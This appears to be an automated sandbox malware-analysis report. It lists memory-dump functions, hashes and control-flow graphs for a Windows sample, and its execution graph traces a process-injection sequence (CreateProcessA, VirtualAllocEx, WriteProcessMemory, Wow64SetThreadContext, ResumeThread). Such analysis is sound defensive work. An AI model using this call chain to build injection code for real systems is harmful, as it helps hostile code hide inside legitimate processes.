                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-390881366
                                        • Opcode ID: be1ac49da690ee53eacc02d3b01387f6c4964c6f30a90a3680531b36217356df
                                        • Instruction ID: 85f31e9c222004dabbf1f3bec30bd9963997b6b0c46277dfa56c9c35df808a4d
                                        • Opcode Fuzzy Hash: be1ac49da690ee53eacc02d3b01387f6c4964c6f30a90a3680531b36217356df
                                        • Instruction Fuzzy Hash: 22F18D74B00209CFDB59EFA8D594A6EB7B2FF84340F248569D4459B3A8CB35DC86CB81
                                        Function 070884E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 52a40a58cb7c14cb4a4b12f3f5f2bf9abf59b797ebf4a81814a2ae53139d32f5
                                        • Instruction ID: 11f72de10e5009fb03bea6e77ef64c3949a54dc3248d973f13023f7b554ae826
                                        • Opcode Fuzzy Hash: 52a40a58cb7c14cb4a4b12f3f5f2bf9abf59b797ebf4a81814a2ae53139d32f5
                                        • Instruction Fuzzy Hash: 5BB11670A10209CFDBA4EB68D58465EB7F2EF84304F64CA29D445DB395DB74DC86CB81
                                        Function 07088900 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR^q$LR^q$$^q$$^q
                                        • API String ID: 0-2454687669
                                        • Opcode ID: d551a9c33481b410150dbda870a1ce0d6f641a725c4397917f8220984c8f2a88
                                        • Instruction ID: 94a3c1cc208c293c9184bbdafd7a9d91461b7f74cee42a1c457e6adc68472bc5
                                        • Opcode Fuzzy Hash: d551a9c33481b410150dbda870a1ce0d6f641a725c4397917f8220984c8f2a88
                                        • Instruction Fuzzy Hash: 3C51D0707102068FDB58EB28C854A6EB7E6FF89304F148668E4469F3A1DF30EC45CB82
                                        Function 0708ADDB Relevance: 5.2, Strings: 4, Instructions: 157COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 00fc3051c18e60f0ee13b08bcf86c9c77a80118a76877b526f62b78b8574cd22
                                        • Instruction ID: ba27b1f8525a09b214d0372b6d585e45742072aa6569f512aebe5d95b642b596
                                        • Opcode Fuzzy Hash: 00fc3051c18e60f0ee13b08bcf86c9c77a80118a76877b526f62b78b8574cd22
                                        • Instruction Fuzzy Hash: 53517DF0B002069FCBA5EB68E58066EB3F2EB88314F148A2BD445DB755DB35DC45CB81

                                        Execution Graph

                                        Execution Coverage:11.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:148
                                        Total number of Limit Nodes:14
                                        execution_graph 18902 b0b070 18905 b0b159 18902->18905 18903 b0b07f 18906 b0b19c 18905->18906 18907 b0b179 18905->18907 18906->18903 18907->18906 18908 b0b3a0 GetModuleHandleW 18907->18908 18909 b0b3cd 18908->18909 18909->18903 19078 b0d800 19079 b0d846 GetCurrentProcess 19078->19079 19081 b0d898 GetCurrentThread 19079->19081 19084 b0d891 19079->19084 19082 b0d8d5 GetCurrentProcess 19081->19082 19085 b0d8ce 19081->19085 19083 b0d90b GetCurrentThreadId 19082->19083 19087 b0d964 19083->19087 19084->19081 19085->19082 19088 b0da48 DuplicateHandle 19089 b0dade 19088->19089 18910 66d1a86 18911 66d1a8c 18910->18911 18912 66d1a67 18910->18912 18917 66d3bc6 18911->18917 18933 66d3b50 18911->18933 18948 66d3b60 18911->18948 18913 66d1bff 18918 66d3b54 18917->18918 18919 66d3bc9 18917->18919 18921 66d3b82 18918->18921 18963 66d4194 18918->18963 18971 66d3fbf 18918->18971 18978 66d42dd 18918->18978 18983 66d4741 18918->18983 18988 66d4286 18918->18988 18993 66d45c7 18918->18993 18997 66d43a4 18918->18997 19003 66d420a 18918->19003 19010 66d4012 18918->19010 19015 66d40d2 18918->19015 19019 66d4073 18918->19019 19024 66d4270 18918->19024 18919->18913 18921->18913 18934 66d3b54 18933->18934 18935 66d3b82 18934->18935 18936 66d420a 4 API calls 18934->18936 18937 66d43a4 2 API calls 18934->18937 18938 66d45c7 2 API calls 18934->18938 18939 66d4286 2 API calls 18934->18939 18940 66d4741 2 API calls 18934->18940 18941 66d42dd 2 API calls 18934->18941 18942 66d3fbf 4 API calls 18934->18942 18943 66d4194 4 API calls 18934->18943 18944 66d4270 2 API calls 18934->18944 18945 66d4073 2 API calls 18934->18945 18946 66d40d2 2 API calls 18934->18946 18947 66d4012 2 API calls 18934->18947 18935->18913 18936->18935 18937->18935 18938->18935 18939->18935 18940->18935 18941->18935 18942->18935 18943->18935 18944->18935 18945->18935 18946->18935 18947->18935 18949 66d3b7a 18948->18949 18950 66d3b82 18949->18950 18951 66d420a 4 API calls 18949->18951 18952 66d43a4 2 API calls 18949->18952 18953 66d45c7 2 API calls 18949->18953 18954 66d4286 2 API calls 18949->18954 18955 66d4741 2 API calls 18949->18955 18956 66d42dd 2 API calls 18949->18956 18957 66d3fbf 4 API calls 18949->18957 18958 66d4194 4 API calls 18949->18958 18959 66d4270 2 API calls 18949->18959 18960 66d4073 2 API calls 18949->18960 18961 66d40d2 2 API calls 18949->18961 18962 66d4012 2 API calls 18949->18962 18950->18913 18951->18950 18952->18950 18953->18950 18954->18950 18955->18950 18956->18950 18957->18950 18958->18950 18959->18950 18960->18950 18961->18950 18962->18950 18964 66d4491 18963->18964 18965 66d408a 18964->18965 18966 66d409f 18964->18966 19038 66d0958 18964->19038 19042 66d0960 18964->19042 19030 66d08ab 18965->19030 19034 66d08b0 18965->19034 18966->18921 19046 66d15e5 18971->19046 19050 66d15f0 18971->19050 18979 66d4300 18978->18979 19054 66d1368 18979->19054 19058 66d1361 18979->19058 18980 66d4564 18980->18921 18984 66d401e 18983->18984 18984->18983 18985 66d4865 18984->18985 18986 66d1368 WriteProcessMemory 18984->18986 18987 66d1361 WriteProcessMemory 18984->18987 18985->18921 18986->18984 18987->18984 18989 66d428c 18988->18989 18991 66d1368 WriteProcessMemory 18989->18991 18992 66d1361 WriteProcessMemory 18989->18992 18990 66d4122 18990->18921 18991->18990 18992->18990 19062 66d12a8 18993->19062 19066 66d12a6 18993->19066 18994 66d45e5 18998 66d445b 18997->18998 18999 66d401e 18997->18999 18998->18921 19000 66d4865 18999->19000 19001 66d1368 WriteProcessMemory 18999->19001 19002 66d1361 WriteProcessMemory 18999->19002 19000->18921 19001->18999 19002->18999 19070 66d1458 19003->19070 19074 66d1450 19003->19074 19004 66d401e 19005 66d445b 19004->19005 19006 66d1368 WriteProcessMemory 19004->19006 19007 66d1361 WriteProcessMemory 19004->19007 19005->18921 19006->19004 19007->19004 19011 66d401e 19010->19011 19012 66d4865 19011->19012 19013 66d1368 WriteProcessMemory 19011->19013 19014 66d1361 WriteProcessMemory 19011->19014 19012->18921 19013->19011 19014->19011 19017 66d0958 Wow64SetThreadContext 19015->19017 19018 66d0960 Wow64SetThreadContext 19015->19018 19016 66d40ec 19016->18921 19017->19016 19018->19016 19020 66d4079 19019->19020 19022 66d08ab ResumeThread 19020->19022 19023 66d08b0 ResumeThread 19020->19023 19021 66d409f 19021->18921 19022->19021 19023->19021 19025 66d429d 19024->19025 19026 66d46c0 19025->19026 19028 66d1368 WriteProcessMemory 19025->19028 19029 66d1361 WriteProcessMemory 19025->19029 19026->18921 19027 66d4122 19027->18921 19028->19027 19029->19027 19031 66d08f0 ResumeThread 19030->19031 19033 66d0921 19031->19033 19033->18966 19035 66d08f0 ResumeThread 19034->19035 19037 66d0921 19035->19037 19037->18966 19039 66d09a5 Wow64SetThreadContext 19038->19039 19041 66d09ed 19039->19041 19041->18965 19043 66d09a5 Wow64SetThreadContext 19042->19043 19045 66d09ed 19043->19045 19045->18965 19047 66d1679 CreateProcessA 19046->19047 19049 66d183b 19047->19049 19049->19049 19051 66d1679 CreateProcessA 19050->19051 19053 66d183b 19051->19053 19053->19053 19055 66d13b0 WriteProcessMemory 19054->19055 19057 66d1407 19055->19057 19057->18980 19059 66d13b0 WriteProcessMemory 19058->19059 19061 66d1407 19059->19061 19061->18980 19063 66d12e8 VirtualAllocEx 19062->19063 19065 66d1325 19063->19065 19065->18994 19067 66d12e8 VirtualAllocEx 19066->19067 19069 66d1325 19067->19069 19069->18994 19071 66d14a3 ReadProcessMemory 19070->19071 19073 66d14e7 19071->19073 19073->19004 19075 66d14a3 ReadProcessMemory 19074->19075 19077 66d14e7 19075->19077 19077->19004 19090 66d4d70 19091 66d4efb 19090->19091 19092 66d4d96 19090->19092 19092->19091 19094 66d3264 19092->19094 19095 66d4ff0 PostMessageW 19094->19095 19096 66d505a 19095->19096 19096->19092

                                        Executed Functions

                                        Function 00B0D800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 526 b0d800-b0d88f GetCurrentProcess 530 b0d891-b0d897 526->530 531 b0d898-b0d8cc GetCurrentThread 526->531 530->531 532 b0d8d5-b0d909 GetCurrentProcess 531->532 533 b0d8ce-b0d8d4 531->533 534 b0d912-b0d92a 532->534 535 b0d90b-b0d911 532->535 533->532 539 b0d933-b0d962 GetCurrentThreadId 534->539 535->534 540 b0d964-b0d96a 539->540 541 b0d96b-b0d9cd 539->541 540->541
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00B0D87E
                                        • GetCurrentThread.KERNEL32 ref: 00B0D8BB
                                        • GetCurrentProcess.KERNEL32 ref: 00B0D8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 00B0D951
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: b4fe63ead1581510c1d400e54ee6ca2a5cee65bcdf45c322efe3cd8b444f73b5
                                        • Instruction ID: 51ea085e8df5feb9a9fef1b1a9d8f3fd07b67e12c1e8cfaa708d7ae3cbacdc48
                                        • Opcode Fuzzy Hash: b4fe63ead1581510c1d400e54ee6ca2a5cee65bcdf45c322efe3cd8b444f73b5
                                        • Instruction Fuzzy Hash: 375145B09007498FDB14DFAAC548B9EBFF1EF88314F20C469E409A72A0DB349984CF65
                                        Function 066D15E5 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 613 66d15e5-66d1685 615 66d16be-66d16de 613->615 616 66d1687-66d1691 613->616 621 66d1717-66d1746 615->621 622 66d16e0-66d16ea 615->622 616->615 617 66d1693-66d1695 616->617 618 66d16b8-66d16bb 617->618 619 66d1697-66d16a1 617->619 618->615 623 66d16a5-66d16b4 619->623 624 66d16a3 619->624 632 66d177f-66d1839 CreateProcessA 621->632 633 66d1748-66d1752 621->633 622->621 625 66d16ec-66d16ee 622->625 623->623 626 66d16b6 623->626 624->623 627 66d1711-66d1714 625->627 628 66d16f0-66d16fa 625->628 626->618 627->621 630 66d16fc 628->630 631 66d16fe-66d170d 628->631 630->631 631->631 634 66d170f 631->634 644 66d183b-66d1841 632->644 645 66d1842-66d18c8 632->645 633->632 635 66d1754-66d1756 633->635 634->627 637 66d1779-66d177c 635->637 638 66d1758-66d1762 635->638 637->632 639 66d1764 638->639 640 66d1766-66d1775 638->640 639->640 640->640 642 66d1777 640->642 642->637 644->645 655 66d18d8-66d18dc 645->655 656 66d18ca-66d18ce 645->656 658 66d18ec-66d18f0 655->658 659 66d18de-66d18e2 655->659 656->655 657 66d18d0 656->657 657->655 661 66d1900-66d1904 658->661 662 66d18f2-66d18f6 658->662 659->658 660 66d18e4 659->660 660->658 664 66d1916-66d191d 661->664 665 66d1906-66d190c 661->665 662->661 663 66d18f8 662->663 663->661 666 66d191f-66d192e 664->666 667 66d1934 664->667 665->664 666->667 669 66d1935 667->669 669->669
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D1826
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: edb8c010491192098a7e2bd3ba2089573b1cb9376a330de63287a15aaf3e07d4
                                        • Instruction ID: 9584c9f8a56ceb31361c77991f86b299008bf78a6f857182faad37795efe04b8
                                        • Opcode Fuzzy Hash: edb8c010491192098a7e2bd3ba2089573b1cb9376a330de63287a15aaf3e07d4
                                        • Instruction Fuzzy Hash: 76A17B71D00219DFDB50CFA9C841BEEFBB2BF45314F1485A9E848A7290DBB49A85CF91
                                        Function 066D15F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 670 66d15f0-66d1685 672 66d16be-66d16de 670->672 673 66d1687-66d1691 670->673 678 66d1717-66d1746 672->678 679 66d16e0-66d16ea 672->679 673->672 674 66d1693-66d1695 673->674 675 66d16b8-66d16bb 674->675 676 66d1697-66d16a1 674->676 675->672 680 66d16a5-66d16b4 676->680 681 66d16a3 676->681 689 66d177f-66d1839 CreateProcessA 678->689 690 66d1748-66d1752 678->690 679->678 682 66d16ec-66d16ee 679->682 680->680 683 66d16b6 680->683 681->680 684 66d1711-66d1714 682->684 685 66d16f0-66d16fa 682->685 683->675 684->678 687 66d16fc 685->687 688 66d16fe-66d170d 685->688 687->688 688->688 691 66d170f 688->691 701 66d183b-66d1841 689->701 702 66d1842-66d18c8 689->702 690->689 692 66d1754-66d1756 690->692 691->684 694 66d1779-66d177c 692->694 695 66d1758-66d1762 692->695 694->689 696 66d1764 695->696 697 66d1766-66d1775 695->697 696->697 697->697 699 66d1777 697->699 699->694 701->702 712 66d18d8-66d18dc 702->712 713 66d18ca-66d18ce 702->713 715 66d18ec-66d18f0 712->715 716 66d18de-66d18e2 712->716 713->712 714 66d18d0 713->714 714->712 718 66d1900-66d1904 715->718 719 66d18f2-66d18f6 715->719 716->715 717 66d18e4 716->717 717->715 721 66d1916-66d191d 718->721 722 66d1906-66d190c 718->722 719->718 720 66d18f8 719->720 720->718 723 66d191f-66d192e 721->723 724 66d1934 721->724 722->721 723->724 726 66d1935 724->726 726->726
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D1826
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: ce675b939a534b310547ef91e36349b9c32c2f2f268e1400374bd80dcfa8be31
                                        • Instruction ID: 3c92d8528a3d1bcde615a931a882ad04af11c7c7c666f2f0b95eec15b684dad8
                                        • Opcode Fuzzy Hash: ce675b939a534b310547ef91e36349b9c32c2f2f268e1400374bd80dcfa8be31
                                        • Instruction Fuzzy Hash: D4918B71D00219DFDB50CFA9C840BEDFBB2BF49314F1485A9E848A7290DBB49A85CF91
                                        Function 00B0B159 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 727 b0b159-b0b177 728 b0b1a3-b0b1a7 727->728 729 b0b179-b0b186 call b0a4e0 727->729 731 b0b1a9-b0b1b3 728->731 732 b0b1bb-b0b1fc 728->732 734 b0b188 729->734 735 b0b19c 729->735 731->732 738 b0b209-b0b217 732->738 739 b0b1fe-b0b206 732->739 782 b0b18e call b0b3f0 734->782 783 b0b18e call b0b400 734->783 735->728 740 b0b219-b0b21e 738->740 741 b0b23b-b0b23d 738->741 739->738 743 b0b220-b0b227 call b0a4ec 740->743 744 b0b229 740->744 746 b0b240-b0b247 741->746 742 b0b194-b0b196 742->735 745 b0b2d8-b0b398 742->745 748 b0b22b-b0b239 743->748 744->748 777 b0b3a0-b0b3cb GetModuleHandleW 745->777 778 b0b39a-b0b39d 745->778 749 b0b254-b0b25b 746->749 750 b0b249-b0b251 746->750 748->746 752 b0b268-b0b271 call b0a4fc 749->752 753 b0b25d-b0b265 749->753 750->749 758 b0b273-b0b27b 752->758 759 b0b27e-b0b283 752->759 753->752 758->759 760 b0b2a1-b0b2ae 759->760 761 b0b285-b0b28c 759->761 768 b0b2b0-b0b2ce 760->768 769 b0b2d1-b0b2d7 760->769 761->760 763 b0b28e-b0b29e call b0a50c call b0a51c 761->763 763->760 768->769 779 b0b3d4-b0b3e8 777->779 780 b0b3cd-b0b3d3 777->780 778->777 780->779 782->742 783->742
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B3BE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 39893f70aba54c5fbb62e3e381a57cdaaff5de7189db1081bbe1c568546bdd21
                                        • Instruction ID: cd9249bd2e98123329766bfd3f233b85ed1b0e65fe10d5057b125f5c6ce361d5
                                        • Opcode Fuzzy Hash: 39893f70aba54c5fbb62e3e381a57cdaaff5de7189db1081bbe1c568546bdd21
                                        • Instruction Fuzzy Hash: A1814470A00B058FD724DF69D455B9ABBF1FF88304F008A6DD48ADBA90DB74E945CB91
                                        Function 00B05E75 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 784 b05e75-b05f41 CreateActCtxA 786 b05f43-b05f49 784->786 787 b05f4a-b05fa4 784->787 786->787 794 b05fb3-b05fb7 787->794 795 b05fa6-b05fa9 787->795 796 b05fc8 794->796 797 b05fb9-b05fc5 794->797 795->794 799 b05fc9 796->799 797->796 799->799
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00B05F31
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 1f5571552d25f585a41d2b4f8fadb087cb9d4f08c581ff24e61fd9cffc25a7fb
                                        • Instruction ID: 16a58e2128d5760cd6c0703a9599a1fe2be42577b2834cc9bfe4fdcdb53072ea
                                        • Opcode Fuzzy Hash: 1f5571552d25f585a41d2b4f8fadb087cb9d4f08c581ff24e61fd9cffc25a7fb
                                        • Instruction Fuzzy Hash: B54102B0C00619CFDB24CFA9C944BDEBBF5BF49304F2484AAD008AB295DB756986CF50
                                        Function 00B049D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 800 b049d4-b05f41 CreateActCtxA 803 b05f43-b05f49 800->803 804 b05f4a-b05fa4 800->804 803->804 811 b05fb3-b05fb7 804->811 812 b05fa6-b05fa9 804->812 813 b05fc8 811->813 814 b05fb9-b05fc5 811->814 812->811 816 b05fc9 813->816 814->813 816->816
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00B05F31
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 772951b633bde908ee1ae4040c80e5c586a4cf7a81104dc8ea37a538a9cd862a
                                        • Instruction ID: 9e9ed961a26d4ef1f06982a22467660ae6e1492183ef187e51a855830fdc0599
                                        • Opcode Fuzzy Hash: 772951b633bde908ee1ae4040c80e5c586a4cf7a81104dc8ea37a538a9cd862a
                                        • Instruction Fuzzy Hash: 8641DFB0C00619CBDB24DFA9C984BDEBBF5BF48304F2084AAD408AB695DB756945CF90
                                        Function 066D5080 Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 817 66d5080-66d5088 818 66d5058-66d505a 817->818 819 66d508a-66d508d 817->819 827 66d505c-66d5062 818->827 828 66d5063-66d5077 818->828 821 66d508f-66d50b5 819->821 822 66d5026-66d5033 819->822 825 66d50bc-66d50cf 821->825 826 66d50b7 821->826 823 66d503d-66d5053 PostMessageW 822->823 824 66d5035-66d5038 822->824 823->818 824->823 831 66d50d1-66d50de 825->831 832 66d50e0-66d50fb 825->832 826->825 827->828 831->832 835 66d50fd 832->835 836 66d5105 832->836 835->836 837 66d5106 836->837 837->837
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 066D504D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: c14309cafe72e33791d3c7a7ec3c6679fd503b7d23b33b49e3f0897d2597e78f
                                        • Instruction ID: e20394b84ab50151d0f7c11720a148b832bcde6518d5810c190f712269ff3968
                                        • Opcode Fuzzy Hash: c14309cafe72e33791d3c7a7ec3c6679fd503b7d23b33b49e3f0897d2597e78f
                                        • Instruction Fuzzy Hash: 70219A72D052298BDB60DFA5D8047EEBBF4AF48348F14805AD802AB642CB395944CBE0
                                        Function 066D1361 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 838 66d1361-66d13b6 840 66d13b8-66d13c4 838->840 841 66d13c6-66d1405 WriteProcessMemory 838->841 840->841 843 66d140e-66d143e 841->843 844 66d1407-66d140d 841->844 844->843
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D13F8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 045ae6b5faefc15f9c6f6b93f18bb0ccd2968b97de4a5aeb329e0520a8cbdeff
                                        • Instruction ID: 8b07d01b3db3c935ab5e5dff7e60ac2da6ec4fa6d90d2cd1dfadc0f8290bb0be
                                        • Opcode Fuzzy Hash: 045ae6b5faefc15f9c6f6b93f18bb0ccd2968b97de4a5aeb329e0520a8cbdeff
                                        • Instruction Fuzzy Hash: E32135B1D002599FCB10CFAAC881BDEBBF1FB48314F10842AE959A7241D7789955CBA0
                                        Function 066D511B Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 848 66d511b-66d5124 849 66d50be 848->849 850 66d5127-66d5133 848->850 851 66d504b-66d505a PostMessageW 849->851 852 66d50c0-66d50cf 849->852 853 66d5135-66d514c 850->853 854 66d5156-66d5159 850->854 860 66d505c-66d5062 851->860 861 66d5063-66d5077 851->861 856 66d50d1-66d50de 852->856 857 66d50e0-66d50fb 852->857 853->854 868 66d514e-66d5153 853->868 856->857 863 66d50fd 857->863 864 66d5105 857->864 860->861 863->864 867 66d5106 864->867 867->867 868->854
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 633ef0b66054cb905f43c8199af235e92288cd074f04314b8f69a7683e327637
                                        • Instruction ID: aed2b43181194f223a8a58dc4e8336fd47be7b2aa83642ea3019ada43832561f
                                        • Opcode Fuzzy Hash: 633ef0b66054cb905f43c8199af235e92288cd074f04314b8f69a7683e327637
                                        • Instruction Fuzzy Hash: 66210232E063508FDB219B2AD8007AFBBF49F85254F19846BD846E7A81CB759904CBE1
                                        Function 066D1368 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 869 66d1368-66d13b6 871 66d13b8-66d13c4 869->871 872 66d13c6-66d1405 WriteProcessMemory 869->872 871->872 874 66d140e-66d143e 872->874 875 66d1407-66d140d 872->875 875->874
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D13F8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 2c9e9109d70e9296cfee65a98bb617bbabca64d2d0d7290b697b60f8cbf1a1fa
                                        • Instruction ID: 057a1e194484695daddf4e4641a12218b2e6d3fc2a96b14675ad660f6420ae5d
                                        • Opcode Fuzzy Hash: 2c9e9109d70e9296cfee65a98bb617bbabca64d2d0d7290b697b60f8cbf1a1fa
                                        • Instruction Fuzzy Hash: 5C2113B19003599FCB10CFAAC885BDEBBF5FB48314F10842AE959A7250D778A954CBA4
                                        Function 066D1450 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 879 66d1450-66d14e5 ReadProcessMemory 882 66d14ee-66d151e 879->882 883 66d14e7-66d14ed 879->883 883->882
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D14D8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 7b800046f1225622988e55864c6cc4101c12182193b4900503086800f3ed4b6c
                                        • Instruction ID: f0064b2c713bf3500adce3728b8fec1a0b0f4aac9ed9d0db736dd532e189610d
                                        • Opcode Fuzzy Hash: 7b800046f1225622988e55864c6cc4101c12182193b4900503086800f3ed4b6c
                                        • Instruction Fuzzy Hash: 542136B1D002499FCB10DFAAC881ADEFBF5FF48314F108429E959A7250D7789545CBA1
                                        Function 066D0958 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D09DE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
